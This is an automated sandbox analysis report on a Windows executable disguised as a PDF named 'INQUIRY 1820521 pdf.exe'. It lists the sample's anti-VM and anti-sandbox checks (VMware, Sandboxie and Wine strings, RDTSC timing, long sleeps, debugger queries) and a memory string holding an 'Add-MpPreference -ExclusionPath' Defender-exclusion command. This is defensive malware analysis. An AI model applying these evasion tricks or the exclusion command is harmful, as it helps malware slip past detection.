Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY 1820521 pdf.exe PID: 6928, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000A098E4 second address: 0000000000A098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000A09B5E second address: 0000000000A09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Code function: 9_2_00409A90 rdtsc

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6932	Thread sleep time: -100694s >= -30000s
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4200	Thread sleep time: -58000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6828	Thread sleep time: -55000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Thread delayed: delay time: 100694
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000A.00000000.701320132.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.697754798.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.701320132.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690336891.000000000B5A7000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA;\|Y
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000A.00000002.917434939.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000000.702010106.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Code function: 9_2_00409A90 rdtsc

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Code function: 9_2_0040ACD0 LdrLoadDll,

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01550050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01550050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01601074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01604015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01604015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01605BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015ED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015C4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01535210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01553A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01548A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01557D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01573D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015BA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]
